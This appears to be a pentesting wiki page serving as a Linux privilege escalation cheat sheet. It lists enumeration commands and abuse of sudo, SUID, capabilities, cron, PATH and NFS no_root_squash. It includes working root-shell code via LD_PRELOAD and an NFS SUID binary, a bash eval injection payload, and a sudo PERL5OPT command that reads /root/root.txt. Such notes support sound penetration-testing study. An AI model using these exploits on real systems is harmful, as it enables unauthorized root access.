Linux Privilege Esclation

Enumeration

Commands:

hostname

Will return the hostname of the target machine.

uname -a

Will print system information giving us additional detail about the kernel used by the system.

cat /proc/version

The proc filesystem (procfs) provides information about the target system processes.

cat /etc/issue

This file usually contains some information about the OS but can easily be customized.

ps

This command is an effective way to see the running processes on a Linux system.

env

This command will show environment variables.

sudo -l

Check which commands can be ran as root

history

Looking at earlier commands with this command.

ifconfig

The target system may be a pivoting point to another network.

netstat

Following an initial checks for existing interfaces and network routes, it is worth looking into existing communications.

netstat -a: shows all listening ports and established connections.
netstat -at or netstat -au can also be used to list TCP or UDP protocols respectively.
netstat -l: list ports in “listening” mode. These ports are open and ready to accept incoming connections. This can be used with the “t” option to list only ports that are listening using the TCP protocol (below)

Find command

find

Searching the target system for important information and potential privilege escalation vectors can be fruitful. The built-in “find” command is useful and worth keeping in your arsenal.

Find files:

find . -name flag1.txt: find the file named “flag1.txt” in the current directory
find /home -name flag1.txt: find the file names “flag1.txt” in the /home directory
find / -type d -name config: find the directory named config under “/”
find / -type f -perm 0777: find files with the 777 permissions (files readable, writable, and executable by all users)
find / -perm a=x: find executable files
find /home -user frank: find all files for user “frank” under “/home”
find / -mtime 10: find files that were modified in the last 10 days
find / -atime 10: find files that were accessed in the last 10 day
find / -cmin -60: find files changed within the last hour (60 minutes)
find / -amin -60: find files accesses within the last hour (60 minutes)
find / -size 50M: find files with a 50 MB size

Automated Enumeration Tools

LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
LinEnum: https://github.com/rebootuser/LinEnum
LES (Linux Exploit Suggester): https://github.com/mzet-/linux-exploit-suggester
Linux Smart Enumeration: https://github.com/diego-treitos/linux-smart-enumeration
Linux Priv Checker: https://github.com/linted/linuxprivchecker

Kernel Exploits

https://www.linuxkernelcves.com/cves

The Kernel exploit methodology is simple;

Identify the kernel version
Search and find an exploit code for the kernel version of the target system
Run the exploit

Sudo command

The sudo command, by default, allows you to run a program with root privileges. Under some conditions, system administrators may need to give regular users some flexibility on their privileges. For example, a junior SOC analyst may need to use Nmap regularly but would not be cleared for full root access. In this situation, the system administrator can allow this user to only run Nmap with root privileges while keeping its regular privilege level throughout the rest of the system.

Any user can check its current situation related to root privileges using the sudo -l command.

sudo -l

https://gtfobins.github.io/ is a valuable source that provides information on how any program, on which you may have sudo rights, can be used.

Leverage LD_PRELOAD

On some systems, you may see the LD_PRELOAD environment option.

LD_PRELOAD is a function that allows any program to use shared libraries.

The steps of this privilege escalation vector can be summarized as follows;

Check for LD_PRELOAD (with the env_keep option)
Write a simple C code compiled as a share object (.so extension) file
Run the program with sudo rights and the LD_PRELOAD option pointing to our .so file

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

SUID

You will notice these files have an “s” bit set showing their special permission level.

find / -type f -perm -04000 -ls 2>/dev/null will list files that have SUID or SGID bits set.

find / -type f -perm -04000 -ls 2>/dev/null

A good practice would be to compare executables on this list with GTFOBins (https://gtfobins.github.io)

Capabilities

Another method system administrators can use to increase the privilege level of a process or binary is “Capabilities”. Capabilities help manage privileges at a more granular level.

getcap -r / 2>/dev/null

We can use the getcap tool to list enabled capabilities

💡 GTFObins has a good list of binaries that can be leveraged for privilege escalation if we find any set capabilities.

Example: https://gtfobins.github.io/gtfobins/vim/#capabilities

Cron jobs are used to run scripts or binaries at specific times. By default, they run with the privilege of their owners and not the current user. While properly configured cron jobs are not inherently vulnerable, they can provide a privilege escalation vector under some conditions.

Any user can read the file keeping system-wide cron jobs under /etc/crontab

cat /etc/crontab

PATH

If a folder for which your user has write permission is located in the path, you could potentially hijack an application to run a script. PATH in Linux is an environmental variable that tells the operating system where to search for executables. For any command that is not built into the shell or that is not defined with an absolute path, Linux will start searching in folders defined under PATH.

What folders are located under $PATH
Does your current user have write privileges for any of these folders?
Can you modify $PATH?
Is there a script/application you can start that will be affected by this vulnerability?

Find writeable folders:

find / -writable 2>/dev/null

An alternative could be the command below.

find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u

We have added “grep-v proc” to get rid of the many results related to running processes.

find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u

The folder that will be easier to write to is probably /tmp. At this point because /tmp is not present in PATH so we will need to add it. As we can see below, the “export PATH=/tmp:$PATH” command accomplishes this.

export PATH=/tmp:$PATH

export PATH=$(pwd):$PATH

NFS

NFS (Network File Sharing) configuration is kept in the /etc/exports file. This file is created during the NFS server installation and can usually be read by users.

The critical element for this privilege escalation vector is the “no_root_squash” option you can see above. By default, NFS will change the root user to nfsnobody and strip any file from operating with root privileges. If the “no_root_squash” option is present on a writable share, we can create an executable with SUID bit set and run it on the target system.

NFS (Network File Sharing) configuration is kept in the /etc/exports file

cat /etc/exports

We will start by enumerating mountable shares from our attacking machine.

showmount -e {IP}

We will mount one of the “no_root_squash” shares to our attacking machine and start building our executable.

mount -o rw {IP}:/share /tmp/mountdirectory

As we can set SUID bits, a simple executable that will run /bin/bash on the target system will do the job.

int main()
{ setgid(0);
  setuid(0);
  system("/bin/bash");
	return 0;
}

Compile it:

gcc nfs.c -o nfs -w

Give it SUID permissions to run as root

chmod +s nfs

Pspy

pspy is a command line tool designed to snoop on processes without need for root permissions.

GitHub - DominicBreuker/pspy: Monitor linux processes without root permissionsGitHub

.\pspy64

Bash scripts

A bash script that is being ran by someone with higher privileges can be interesting to investigate.

Example of vulnerable bashscript:

Bash’s white collar eval: [[ $var -eq 42 ]] runs arbitrary code too

#!/bin/bash
read -rp "Enter guess: " num
if [[ $num -eq 42 ]]
then
  echo "Correct"
else
  echo "Wrong"
fi

Exploit:

$ ./myscript
Enter guess: **a[$(/path/to/exploit.sh>&2)]+42**
Sun Feb  4 19:06:19 PST 2018
Correct

ENV

We can also manipulate our environment to escalate privileges. Consider the following sudoers file:

(root) SETENV: NOPASSWD: /opt/monitor.sh

We have the ability to SETENV as root. This means that we can set any environment variable.

Exploiting env

We can for example exploit it with PERL:

jack@clicker:/tmp$ sudo PERL5OPT=-d PERL5DB='system("cat /root/root.txt");' /opt/monitor.sh

PreviousSliver C2 NextEscape docker

Last updated 7 hours ago